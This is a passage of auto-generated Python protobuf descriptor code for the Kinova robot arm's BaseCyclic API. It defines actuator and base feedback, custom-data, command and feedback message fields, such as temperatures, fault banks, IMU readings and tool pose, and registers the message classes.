number=8, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='temperature_motor', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.temperature_motor', index=8,
number=9, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='temperature_core', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.temperature_core', index=9,
number=10, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='fault_bank_a', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.fault_bank_a', index=10,
number=11, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='fault_bank_b', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.fault_bank_b', index=11,
number=12, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='warning_bank_a', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.warning_bank_a', index=12,
number=13, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='warning_bank_b', full_name='Kinova.Api.BaseCyclic.ActuatorFeedback.warning_bank_b', index=13,
number=14, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=227,
serialized_end=545,
)
_ACTUATORCUSTOMDATA = _descriptor.Descriptor(
name='ActuatorCustomData',
full_name='Kinova.Api.BaseCyclic.ActuatorCustomData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='command_id', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.command_id', index=0,
number=1, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_0', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_0', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_1', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_1', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_2', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_2', index=3,
number=4, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_3', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_3', index=4,
number=5, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_4', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_4', index=5,
number=6, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_5', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_5', index=6,
number=7, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_6', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_6', index=7,
number=8, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_7', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_7', index=8,
number=9, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_8', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_8', index=9,
number=10, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_9', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_9', index=10,
number=11, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_10', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_10', index=11,
number=12, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_11', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_11', index=12,
number=13, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_12', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_12', index=13,
number=14, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_13', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_13', index=14,
number=15, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_14', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_14', index=15,
number=16, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_15', full_name='Kinova.Api.BaseCyclic.ActuatorCustomData.custom_data_15', index=16,
number=17, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=548,
serialized_end=962,
)
_BASEFEEDBACK = _descriptor.Descriptor(
name='BaseFeedback',
full_name='Kinova.Api.BaseCyclic.BaseFeedback',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='active_state_connection_identifier', full_name='Kinova.Api.BaseCyclic.BaseFeedback.active_state_connection_identifier', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='active_state', full_name='Kinova.Api.BaseCyclic.BaseFeedback.active_state', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='arm_voltage', full_name='Kinova.Api.BaseCyclic.BaseFeedback.arm_voltage', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='arm_current', full_name='Kinova.Api.BaseCyclic.BaseFeedback.arm_current', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='temperature_cpu', full_name='Kinova.Api.BaseCyclic.BaseFeedback.temperature_cpu', index=4,
number=5, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='temperature_ambient', full_name='Kinova.Api.BaseCyclic.BaseFeedback.temperature_ambient', index=5,
number=6, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='imu_acceleration_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.imu_acceleration_x', index=6,
number=7, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='imu_acceleration_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.imu_acceleration_y', index=7,
number=8, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='imu_acceleration_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.imu_acceleration_z', index=8,
number=9, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='imu_angular_velocity_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.imu_angular_velocity_x', index=9,
number=10, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='imu_angular_velocity_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.imu_angular_velocity_y', index=10,
number=11, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='imu_angular_velocity_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.imu_angular_velocity_z', index=11,
number=12, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_pose_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_pose_x', index=12,
number=13, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_pose_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_pose_y', index=13,
number=14, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_pose_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_pose_z', index=14,
number=15, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_pose_theta_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_pose_theta_x', index=15,
number=16, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_pose_theta_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_pose_theta_y', index=16,
number=17, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_pose_theta_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_pose_theta_z', index=17,
number=18, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_twist_linear_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_twist_linear_x', index=18,
number=19, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_twist_linear_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_twist_linear_y', index=19,
number=20, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_twist_linear_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_twist_linear_z', index=20,
number=21, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_twist_angular_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_twist_angular_x', index=21,
number=22, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_twist_angular_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_twist_angular_y', index=22,
number=23, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_twist_angular_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_twist_angular_z', index=23,
number=24, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_external_wrench_force_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_external_wrench_force_x', index=24,
number=25, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_external_wrench_force_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_external_wrench_force_y', index=25,
number=26, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_external_wrench_force_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_external_wrench_force_z', index=26,
number=27, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_external_wrench_torque_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_external_wrench_torque_x', index=27,
number=28, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_external_wrench_torque_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_external_wrench_torque_y', index=28,
number=29, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tool_external_wrench_torque_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.tool_external_wrench_torque_z', index=29,
number=30, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='fault_bank_a', full_name='Kinova.Api.BaseCyclic.BaseFeedback.fault_bank_a', index=30,
number=31, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='fault_bank_b', full_name='Kinova.Api.BaseCyclic.BaseFeedback.fault_bank_b', index=31,
number=32, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='warning_bank_a', full_name='Kinova.Api.BaseCyclic.BaseFeedback.warning_bank_a', index=32,
number=33, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='warning_bank_b', full_name='Kinova.Api.BaseCyclic.BaseFeedback.warning_bank_b', index=33,
number=34, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='commanded_tool_pose_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.commanded_tool_pose_x', index=34,
number=35, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='commanded_tool_pose_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.commanded_tool_pose_y', index=35,
number=36, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='commanded_tool_pose_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.commanded_tool_pose_z', index=36,
number=37, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='commanded_tool_pose_theta_x', full_name='Kinova.Api.BaseCyclic.BaseFeedback.commanded_tool_pose_theta_x', index=37,
number=38, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='commanded_tool_pose_theta_y', full_name='Kinova.Api.BaseCyclic.BaseFeedback.commanded_tool_pose_theta_y', index=38,
number=39, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='commanded_tool_pose_theta_z', full_name='Kinova.Api.BaseCyclic.BaseFeedback.commanded_tool_pose_theta_z', index=39,
number=40, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=965,
serialized_end=2198,
)
_CUSTOMDATA = _descriptor.Descriptor(
name='CustomData',
full_name='Kinova.Api.BaseCyclic.CustomData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='frame_id', full_name='Kinova.Api.BaseCyclic.CustomData.frame_id', index=0,
number=1, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_0', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_0', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_1', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_1', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_2', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_2', index=3,
number=4, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_3', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_3', index=4,
number=5, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_4', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_4', index=5,
number=6, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_5', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_5', index=6,
number=7, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_6', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_6', index=7,
number=8, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='custom_data_7', full_name='Kinova.Api.BaseCyclic.CustomData.custom_data_7', index=8,
number=9, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='actuators_custom_data', full_name='Kinova.Api.BaseCyclic.CustomData.actuators_custom_data', index=9,
number=10, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='interconnect_custom_data', full_name='Kinova.Api.BaseCyclic.CustomData.interconnect_custom_data', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2201,
serialized_end=2566,
)
_COMMAND = _descriptor.Descriptor(
name='Command',
full_name='Kinova.Api.BaseCyclic.Command',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='frame_id', full_name='Kinova.Api.BaseCyclic.Command.frame_id', index=0,
number=1, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='actuators', full_name='Kinova.Api.BaseCyclic.Command.actuators', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='interconnect', full_name='Kinova.Api.BaseCyclic.Command.interconnect', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2569,
serialized_end=2717,
)
_FEEDBACK = _descriptor.Descriptor(
name='Feedback',
full_name='Kinova.Api.BaseCyclic.Feedback',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='frame_id', full_name='Kinova.Api.BaseCyclic.Feedback.frame_id', index=0,
number=1, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='base', full_name='Kinova.Api.BaseCyclic.Feedback.base', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='actuators', full_name='Kinova.Api.BaseCyclic.Feedback.actuators', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='interconnect', full_name='Kinova.Api.BaseCyclic.Feedback.interconnect', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2720,
serialized_end=2922,
)
_BASEFEEDBACK.fields_by_name['active_state'].enum_type = Common__pb2._ARMSTATE
_CUSTOMDATA.fields_by_name['actuators_custom_data'].message_type = _ACTUATORCUSTOMDATA
_CUSTOMDATA.fields_by_name['interconnect_custom_data'].message_type = InterconnectCyclicMessage__pb2._CUSTOMDATA
_COMMAND.fields_by_name['actuators'].message_type = _ACTUATORCOMMAND
_COMMAND.fields_by_name['interconnect'].message_type = InterconnectCyclicMessage__pb2._COMMAND
_FEEDBACK.fields_by_name['base'].message_type = _BASEFEEDBACK
_FEEDBACK.fields_by_name['actuators'].message_type = _ACTUATORFEEDBACK
_FEEDBACK.fields_by_name['interconnect'].message_type = InterconnectCyclicMessage__pb2._FEEDBACK
DESCRIPTOR.message_types_by_name['ActuatorCommand'] = _ACTUATORCOMMAND
DESCRIPTOR.message_types_by_name['ActuatorFeedback'] = _ACTUATORFEEDBACK
DESCRIPTOR.message_types_by_name['ActuatorCustomData'] = _ACTUATORCUSTOMDATA
DESCRIPTOR.message_types_by_name['BaseFeedback'] = _BASEFEEDBACK
DESCRIPTOR.message_types_by_name['CustomData'] = _CUSTOMDATA
DESCRIPTOR.message_types_by_name['Command'] = _COMMAND
DESCRIPTOR.message_types_by_name['Feedback'] = _FEEDBACK
DESCRIPTOR.enum_types_by_name['ServiceVersion'] = _SERVICEVERSION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ActuatorCommand = _reflection.GeneratedProtocolMessageType('ActuatorCommand', (_message.Message,), dict(
DESCRIPTOR = _ACTUATORCOMMAND,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.ActuatorCommand)
))
_sym_db.RegisterMessage(ActuatorCommand)
ActuatorFeedback = _reflection.GeneratedProtocolMessageType('ActuatorFeedback', (_message.Message,), dict(
DESCRIPTOR = _ACTUATORFEEDBACK,
__module__ = 'BaseCyclic_pb2'
# @@protoc_insertion_point(class_scope:Kinova.Api.BaseCyclic.ActuatorFeedback)
))
